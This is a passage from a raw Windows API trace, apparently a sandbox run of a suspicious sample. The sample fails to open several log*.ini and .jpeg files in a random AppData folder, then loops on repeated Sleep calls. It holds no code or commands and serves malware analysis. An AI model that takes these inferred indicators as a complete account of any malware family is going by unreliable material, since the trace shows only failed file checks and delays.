DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.606] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.606] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0213.606] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0213.606] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.606] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.606] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0213.606] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0213.606] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.606] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.606] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0213.606] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0213.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.607] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.607] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0213.607] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0213.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.607] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.607] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0213.607] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0213.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.607] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.607] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0213.607] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0213.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.607] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.607] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0213.607] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0213.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.608] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.608] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0213.608] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0213.608] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0213.608] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0213.608] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0213.608] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0213.608] Sleep (dwMilliseconds=0x7d0) [0213.609] Sleep (dwMilliseconds=0x7d0) [0213.611] Sleep (dwMilliseconds=0x7d0) [0213.613] Sleep (dwMilliseconds=0x7d0) [0213.615] Sleep (dwMilliseconds=0x7d0) [0213.616] Sleep (dwMilliseconds=0x7d0) [0213.617] Sleep (dwMilliseconds=0x7d0) [0213.619] Sleep (dwMilliseconds=0x7d0) [0213.620] Sleep (dwMilliseconds=0x7d0) [0213.622] Sleep (dwMilliseconds=0x7d0) [0213.624] Sleep (dwMilliseconds=0x7d0) [0213.626] Sleep (dwMilliseconds=0x7d0) [0213.627] Sleep (dwMilliseconds=0x7d0) [0213.628] Sleep (dwMilliseconds=0x7d0) [0213.630] Sleep (dwMilliseconds=0x7d0) [0213.631] Sleep (dwMilliseconds=0x7d0) [0213.633] Sleep (dwMilliseconds=0x7d0) [0213.635] Sleep (dwMilliseconds=0x7d0) [0213.637] Sleep (dwMilliseconds=0x7d0) [0213.638] Sleep (dwMilliseconds=0x7d0) [0213.640] Sleep (dwMilliseconds=0x7d0) [0213.641] Sleep (dwMilliseconds=0x7d0) [0213.643] Sleep (dwMilliseconds=0x7d0) [0213.644] Sleep (dwMilliseconds=0x7d0) [0213.646] Sleep (dwMilliseconds=0x7d0) [0213.647] Sleep (dwMilliseconds=0x7d0) [0213.649] Sleep (dwMilliseconds=0x7d0) [0213.650] Sleep (dwMilliseconds=0x7d0) [0213.652] Sleep (dwMilliseconds=0x7d0) [0213.653] Sleep (dwMilliseconds=0x7d0) [0213.655] Sleep (dwMilliseconds=0x7d0) [0213.657] Sleep (dwMilliseconds=0x7d0) [0213.659] Sleep (dwMilliseconds=0x7d0) [0213.660] Sleep (dwMilliseconds=0x7d0) [0213.662] Sleep (dwMilliseconds=0x7d0) [0213.663] Sleep (dwMilliseconds=0x7d0) [0213.665] Sleep (dwMilliseconds=0x7d0) [0213.666] Sleep (dwMilliseconds=0x7d0) [0213.669] Sleep (dwMilliseconds=0x7d0) [0213.672] Sleep (dwMilliseconds=0x7d0) [0213.674] Sleep (dwMilliseconds=0x7d0) [0213.675] Sleep (dwMilliseconds=0x7d0) [0213.677] Sleep (dwMilliseconds=0x7d0) [0213.679] Sleep (dwMilliseconds=0x7d0) [0213.680] Sleep (dwMilliseconds=0x7d0) [0213.682] Sleep (dwMilliseconds=0x7d0) [0213.683] Sleep (dwMilliseconds=0x7d0) [0213.685] Sleep (dwMilliseconds=0x7d0) [0213.686] Sleep (dwMilliseconds=0x7d0) [0213.688] Sleep (dwMilliseconds=0x7d0) [0213.690] Sleep (dwMilliseconds=0x7d0) [0213.693] Sleep (dwMilliseconds=0x7d0) [0213.694] Sleep (dwMilliseconds=0x7d0) [0213.696] Sleep (dwMilliseconds=0x7d0) [0213.697] Sleep (dwMilliseconds=0x7d0) [0213.699] Sleep (dwMilliseconds=0x7d0) [0213.703] Sleep (dwMilliseconds=0x7d0) [0213.705] Sleep (dwMilliseconds=0x7d0) [0213.706] Sleep (dwMilliseconds=0x7d0) [0213.707] Sleep (dwMilliseconds=0x7d0) [0213.709] Sleep (dwMilliseconds=0x7d0) [0213.710] Sleep (dwMilliseconds=0x7d0) [0213.713] Sleep (dwMilliseconds=0x7d0) [0213.715] Sleep (dwMilliseconds=0x7d0) [0213.716] Sleep (dwMilliseconds=0x7d0) [0213.718] Sleep (dwMilliseconds=0x7d0) [0213.719] Sleep (dwMilliseconds=0x7d0) [0213.721] Sleep (dwMilliseconds=0x7d0) [0213.722] Sleep (dwMilliseconds=0x7d0) [0213.723] Sleep (dwMilliseconds=0x7d0) [0213.725] Sleep (dwMilliseconds=0x7d0) [0213.726] Sleep (dwMilliseconds=0x7d0) [0213.728] Sleep (dwMilliseconds=0x7d0) [0213.729] Sleep (dwMilliseconds=0x7d0) [0213.731] Sleep (dwMilliseconds=0x7d0) [0213.732] Sleep (dwMilliseconds=0x7d0) [0213.735] Sleep (dwMilliseconds=0x7d0) [0213.737] Sleep (dwMilliseconds=0x7d0) [0213.739] Sleep (dwMilliseconds=0x7d0) [0213.740] Sleep (dwMilliseconds=0x7d0) [0213.742] Sleep (dwMilliseconds=0x7d0) [0213.743] Sleep (dwMilliseconds=0x7d0) [0213.745] Sleep (dwMilliseconds=0x7d0) [0213.747] Sleep (dwMilliseconds=0x7d0) [0213.749] Sleep (dwMilliseconds=0x7d0) [0213.750] Sleep (dwMilliseconds=0x7d0) [0213.752] Sleep (dwMilliseconds=0x7d0) [0213.753] Sleep (dwMilliseconds=0x7d0) [0213.755] Sleep (dwMilliseconds=0x7d0) [0213.757] Sleep (dwMilliseconds=0x7d0) [0213.759] Sleep (dwMilliseconds=0x7d0) [0213.761] Sleep (dwMilliseconds=0x7d0) [0213.763] Sleep (dwMilliseconds=0x7d0) [0213.764] Sleep (dwMilliseconds=0x7d0) [0213.766] Sleep (dwMilliseconds=0x7d0) [0213.767] Sleep (dwMilliseconds=0x7d0) [0213.769] Sleep (dwMilliseconds=0x7d0) [0213.770] Sleep (dwMilliseconds=0x7d0) [0213.772] Sleep (dwMilliseconds=0x7d0) [0213.773] Sleep (dwMilliseconds=0x7d0) [0213.775] Sleep (dwMilliseconds=0x7d0) [0213.776] Sleep (dwMilliseconds=0x7d0) [0213.779] Sleep (dwMilliseconds=0x7d0) [0213.781] Sleep (dwMilliseconds=0x7d0) [0213.783] Sleep (dwMilliseconds=0x7d0) [0213.784] Sleep (dwMilliseconds=0x7d0) [0213.786] Sleep (dwMilliseconds=0x7d0) [0213.787] Sleep (dwMilliseconds=0x7d0) [0213.789] Sleep (dwMilliseconds=0x7d0) [0213.791] Sleep (dwMilliseconds=0x7d0) [0213.793] Sleep (dwMilliseconds=0x7d0) [0213.795] Sleep (dwMilliseconds=0x7d0) [0213.796] Sleep (dwMilliseconds=0x7d0) [0213.798] Sleep (dwMilliseconds=0x7d0) [0213.799] Sleep (dwMilliseconds=0x7d0) [0213.803] Sleep (dwMilliseconds=0x7d0) [0213.806] Sleep (dwMilliseconds=0x7d0) [0213.807] Sleep (dwMilliseconds=0x7d0) [0213.809] Sleep (dwMilliseconds=0x7d0) [0213.810] Sleep (dwMilliseconds=0x7d0) [0213.812] Sleep (dwMilliseconds=0x7d0) [0213.813] Sleep (dwMilliseconds=0x7d0) [0213.815] Sleep (dwMilliseconds=0x7d0) [0213.816] Sleep (dwMilliseconds=0x7d0) [0213.818] Sleep (dwMilliseconds=0x7d0) [0213.819] Sleep (dwMilliseconds=0x7d0) [0213.821] Sleep (dwMilliseconds=0x7d0) [0213.824] Sleep (dwMilliseconds=0x7d0) [0213.826] Sleep (dwMilliseconds=0x7d0) [0213.827] Sleep (dwMilliseconds=0x7d0) [0213.829] Sleep (dwMilliseconds=0x7d0) [0213.830] Sleep (dwMilliseconds=0x7d0) [0213.832] Sleep (dwMilliseconds=0x7d0) [0213.834] Sleep (dwMilliseconds=0x7d0) [0213.836] Sleep (dwMilliseconds=0x7d0) [0213.837] Sleep (dwMilliseconds=0x7d0) [0213.839] Sleep (dwMilliseconds=0x7d0) [0213.840] Sleep (dwMilliseconds=0x7d0) [0213.842] Sleep (dwMilliseconds=0x7d0) [0213.843] Sleep (dwMilliseconds=0x7d0) [0213.845] Sleep (dwMilliseconds=0x7d0) [0213.846] Sleep (dwMilliseconds=0x7d0) [0213.848] Sleep (dwMilliseconds=0x7d0) [0213.849] Sleep (dwMilliseconds=0x7d0) [0213.851] Sleep (dwMilliseconds=0x7d0) [0213.852] Sleep (dwMilliseconds=0x7d0) [0213.854] Sleep (dwMilliseconds=0x7d0) [0213.856] Sleep (dwMilliseconds=0x7d0) [0213.859] Sleep (dwMilliseconds=0x7d0) [0213.860] Sleep (dwMilliseconds=0x7d0) [0213.862] Sleep (dwMilliseconds=0x7d0) [0213.863] Sleep (dwMilliseconds=0x7d0) [0213.865] Sleep (dwMilliseconds=0x7d0) [0213.866] Sleep (dwMilliseconds=0x7d0) [0213.869] Sleep (dwMilliseconds=0x7d0) [0213.870] Sleep (dwMilliseconds=0x7d0) [0213.872] Sleep (dwMilliseconds=0x7d0) [0213.873] Sleep (dwMilliseconds=0x7d0) [0213.875] Sleep (dwMilliseconds=0x7d0) [0213.878] Sleep (dwMilliseconds=0x7d0) [0213.880] Sleep (dwMilliseconds=0x7d0) [0213.882] Sleep (dwMilliseconds=0x7d0) [0213.883] Sleep (dwMilliseconds=0x7d0) [0213.885] Sleep (dwMilliseconds=0x7d0) [0213.886] Sleep (dwMilliseconds=0x7d0) [0213.888] Sleep (dwMilliseconds=0x7d0) [0213.889] Sleep (dwMilliseconds=0x7d0) [0213.896] Sleep (dwMilliseconds=0x7d0) [0213.897] Sleep (dwMilliseconds=0x7d0) [0213.899] Sleep (dwMilliseconds=0x7d0) [0213.903] Sleep (dwMilliseconds=0x7d0) [0213.905] Sleep (dwMilliseconds=0x7d0) [0213.907] Sleep (dwMilliseconds=0x7d0) [0213.908] Sleep (dwMilliseconds=0x7d0) [0213.910] Sleep (dwMilliseconds=0x7d0) [0213.912] Sleep (dwMilliseconds=0x7d0) [0213.914] Sleep (dwMilliseconds=0x7d0) [0213.916] Sleep (dwMilliseconds=0x7d0) [0213.917] Sleep (dwMilliseconds=0x7d0) [0213.919] Sleep (dwMilliseconds=0x7d0) [0213.920] Sleep (dwMilliseconds=0x7d0) [0213.923] Sleep (dwMilliseconds=0x7d0) [0213.925] Sleep (dwMilliseconds=0x7d0) [0213.927] Sleep (dwMilliseconds=0x7d0) [0213.928] Sleep (dwMilliseconds=0x7d0) [0213.930] Sleep (dwMilliseconds=0x7d0) [0213.931] Sleep (dwMilliseconds=0x7d0) [0213.933] Sleep (dwMilliseconds=0x7d0) [0213.934] Sleep (dwMilliseconds=0x7d0) [0213.936] Sleep (dwMilliseconds=0x7d0) [0213.937] Sleep (dwMilliseconds=0x7d0) [0213.939] Sleep (dwMilliseconds=0x7d0) [0213.940] Sleep (dwMilliseconds=0x7d0) [0213.942] Sleep (dwMilliseconds=0x7d0) [0213.945] Sleep (dwMilliseconds=0x7d0) [0213.947] Sleep (dwMilliseconds=0x7d0) [0213.948] Sleep (dwMilliseconds=0x7d0) [0213.950] Sleep (dwMilliseconds=0x7d0) [0213.951] Sleep (dwMilliseconds=0x7d0) [0213.954] Sleep (dwMilliseconds=0x7d0) [0213.957] Sleep (dwMilliseconds=0x7d0) [0213.958] Sleep (dwMilliseconds=0x7d0) [0213.960] Sleep (dwMilliseconds=0x7d0) [0213.961] Sleep (dwMilliseconds=0x7d0) [0213.963] Sleep (dwMilliseconds=0x7d0) [0213.967] Sleep (dwMilliseconds=0x7d0) [0213.968] Sleep (dwMilliseconds=0x7d0) [0213.970] Sleep (dwMilliseconds=0x7d0) [0213.971] Sleep (dwMilliseconds=0x7d0) [0213.973] Sleep (dwMilliseconds=0x7d0) [0213.974] Sleep (dwMilliseconds=0x7d0) [0213.976] Sleep (dwMilliseconds=0x7d0) [0213.977] Sleep (dwMilliseconds=0x7d0) [0213.979] Sleep (dwMilliseconds=0x7d0) [0213.980] Sleep (dwMilliseconds=0x7d0) [0213.982] Sleep (dwMilliseconds=0x7d0) [0213.983] Sleep (dwMilliseconds=0x7d0) [0213.985] Sleep (dwMilliseconds=0x7d0) [0213.986] Sleep (dwMilliseconds=0x7d0) [0213.991] Sleep (dwMilliseconds=0x7d0) [0213.992] Sleep (dwMilliseconds=0x7d0) [0213.994] Sleep (dwMilliseconds=0x7d0) [0213.996] Sleep (dwMilliseconds=0x7d0) [0214.002] Sleep (dwMilliseconds=0x7d0) [0214.003] Sleep (dwMilliseconds=0x7d0) [0214.005] Sleep (dwMilliseconds=0x7d0) [0214.006] Sleep (dwMilliseconds=0x7d0) [0214.008] Sleep (dwMilliseconds=0x7d0) [0214.009] Sleep (dwMilliseconds=0x7d0) [0214.011] Sleep (dwMilliseconds=0x7d0) [0214.012] Sleep (dwMilliseconds=0x7d0) [0214.014] Sleep (dwMilliseconds=0x7d0) [0214.015] Sleep (dwMilliseconds=0x7d0) [0214.017] Sleep (dwMilliseconds=0x7d0) [0214.018] Sleep (dwMilliseconds=0x7d0) [0214.020] Sleep (dwMilliseconds=0x7d0) [0214.024] Sleep (dwMilliseconds=0x7d0) [0214.025] Sleep (dwMilliseconds=0x7d0) [0214.027] Sleep (dwMilliseconds=0x7d0) [0214.028] Sleep (dwMilliseconds=0x7d0) [0214.030] Sleep (dwMilliseconds=0x7d0) [0214.035] Sleep (dwMilliseconds=0x7d0) [0214.036] Sleep (dwMilliseconds=0x7d0) [0214.038] Sleep (dwMilliseconds=0x7d0) [0214.039] Sleep (dwMilliseconds=0x7d0) [0214.041] Sleep (dwMilliseconds=0x7d0) [0214.045] Sleep (dwMilliseconds=0x7d0) [0214.046] Sleep (dwMilliseconds=0x7d0) [0214.048] Sleep (dwMilliseconds=0x7d0) [0214.049] Sleep (dwMilliseconds=0x7d0) [0214.051] Sleep (dwMilliseconds=0x7d0) [0214.052] Sleep (dwMilliseconds=0x7d0) [0214.054] Sleep (dwMilliseconds=0x7d0) [0214.055] Sleep (dwMilliseconds=0x7d0) [0214.057] Sleep (dwMilliseconds=0x7d0) [0214.058] Sleep (dwMilliseconds=0x7d0) [0214.060] Sleep (dwMilliseconds=0x7d0) [0214.061] Sleep (dwMilliseconds=0x7d0) [0214.063] Sleep (dwMilliseconds=0x7d0) [0214.067] Sleep (dwMilliseconds=0x7d0) [0214.068] Sleep (dwMilliseconds=0x7d0) [0214.070] Sleep (dwMilliseconds=0x7d0) [0214.071] Sleep (dwMilliseconds=0x7d0) [0214.073] Sleep (dwMilliseconds=0x7d0) [0214.078] Sleep (dwMilliseconds=0x7d0) [0214.079] Sleep (dwMilliseconds=0x7d0) [0214.080] Sleep (dwMilliseconds=0x7d0) [0214.082] Sleep (dwMilliseconds=0x7d0) [0214.083] Sleep (dwMilliseconds=0x7d0) [0214.085] Sleep (dwMilliseconds=0x7d0) [0214.090] Sleep (dwMilliseconds=0x7d0) [0214.091] Sleep (dwMilliseconds=0x7d0) [0214.092] Sleep (dwMilliseconds=0x7d0) [0214.094] Sleep (dwMilliseconds=0x7d0) [0214.095] Sleep (dwMilliseconds=0x7d0) [0214.097] Sleep (dwMilliseconds=0x7d0) [0214.098] Sleep (dwMilliseconds=0x7d0) [0214.100] Sleep (dwMilliseconds=0x7d0) [0214.102] Sleep (dwMilliseconds=0x7d0) [0214.104] Sleep (dwMilliseconds=0x7d0) [0214.105] Sleep (dwMilliseconds=0x7d0) [0214.107] Sleep (dwMilliseconds=0x7d0) [0214.111] Sleep (dwMilliseconds=0x7d0) [0214.112] Sleep (dwMilliseconds=0x7d0) [0214.114] Sleep (dwMilliseconds=0x7d0) [0214.116] Sleep (dwMilliseconds=0x7d0) [0214.117] Sleep (dwMilliseconds=0x7d0) [0214.121] Sleep (dwMilliseconds=0x7d0) [0214.122] Sleep (dwMilliseconds=0x7d0) [0214.124] Sleep (dwMilliseconds=0x7d0) [0214.125] Sleep (dwMilliseconds=0x7d0) [0214.127] Sleep (dwMilliseconds=0x7d0) [0214.128] Sleep (dwMilliseconds=0x7d0) [0214.132] Sleep (dwMilliseconds=0x7d0) [0214.134] Sleep (dwMilliseconds=0x7d0) [0214.135] Sleep (dwMilliseconds=0x7d0) [0214.137] Sleep (dwMilliseconds=0x7d0) [0214.138] Sleep (dwMilliseconds=0x7d0) [0214.140] Sleep (dwMilliseconds=0x7d0) [0214.141] Sleep (dwMilliseconds=0x7d0) [0214.143] Sleep (dwMilliseconds=0x7d0) [0214.145] Sleep (dwMilliseconds=0x7d0) [0214.146] Sleep (dwMilliseconds=0x7d0) [0214.147] Sleep (dwMilliseconds=0x7d0) [0214.149] Sleep (dwMilliseconds=0x7d0) [0214.150] Sleep (dwMilliseconds=0x7d0) [0214.154] Sleep (dwMilliseconds=0x7d0) [0214.155] Sleep (dwMilliseconds=0x7d0) [0214.157] Sleep (dwMilliseconds=0x7d0) [0214.158] Sleep (dwMilliseconds=0x7d0) [0214.160] Sleep (dwMilliseconds=0x7d0) [0214.161] Sleep (dwMilliseconds=0x7d0) [0214.165] Sleep (dwMilliseconds=0x7d0) [0214.166] Sleep (dwMilliseconds=0x7d0) [0214.168] 